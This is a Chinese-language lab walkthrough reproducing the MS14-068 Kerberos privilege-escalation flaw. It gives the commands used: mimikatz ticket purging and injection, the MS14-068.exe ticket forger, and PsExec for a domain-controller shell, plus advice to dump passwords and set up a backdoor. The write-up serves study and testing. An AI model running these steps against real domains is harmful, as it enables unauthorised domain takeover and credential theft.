ms14-068漏洞復現
MS14-068域提權漏洞復現
一、漏洞說明
改漏洞可能允許攻擊者將未經授權的域用戶賬戶的權限,提權到域管理員的權限。
微軟官方解釋: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068
二、漏洞原理
Kerberos認證原理:https://www.cnblogs.com/huamingao/p/7267423.html
服務票據是客戶端直接發送給服務器,並請求服務資源的。如果服務器沒有向域控dc驗證pac的話,那麼客戶端可以僞造域管的權限來訪問服務器。
三、漏洞利用前提
1.域控沒有打MS14-068的補丁
2.攻擊者拿下了一臺域內的普通計算機,並獲得普通域用戶以及密碼/hash值,以及用戶的suid
四、實驗環境
域控制器(DC) windows 2008 R2 st13.com 192.168.10.146
域內機器 windows 7 192.168.10.129
Ms14-068.exe 下載地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
PSexec下載地址:https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe
五、漏洞利用
1.首先在域控檢測是否有MS14-068這個漏洞,通過查看是否打補丁(KB3011780)來判斷是否存在漏洞,下圖可以看到沒有打MS14-068漏洞相關的補丁
systeminfo
2.在win7上面測試該漏洞,win7用普通域用戶登錄
測試訪問域控的C盤共享,訪問被拒絕
dir \win2008.xxx.com\c$
3.爲了使我們生成的票據起作用,首先我們需要將內存中已有的kerberos票據清除,清除方法使用mimikatz
kerberos::list
kerberos::purge
kerberos::list
4.使用whoami/all查看本機用戶ID
\5. 利用ms14-068.exe提權工具生成僞造的kerberos協議認證證書
MS14-068.exe -u @ -p -s -d
\6. 利用mimikatz.exe將證書寫入,從而提升爲域管理員
kerberos::ptc xxxx.ccache
7.再次列出域控制器的C盤目錄,成功訪問域控的C盤,說明普通域用戶提權成功
dir \win2008.xxx.com\c$
8.使用PSTools目錄下的PsExec.exe獲取shell,#psexec.exe以管理員權限運行連接域控
接下來可以在域控上做任何操作了
psexec.exe \win2008.xxx.com cmd.exe
總結:
1、查看目標是否存在MS14-068漏洞
2、使用ms14-068.exe生成票據
3、mimikatz注入票據,獲得域控權限
4、PSexec創建後門
如果有域管理員的進程,直接mimikatz抓密碼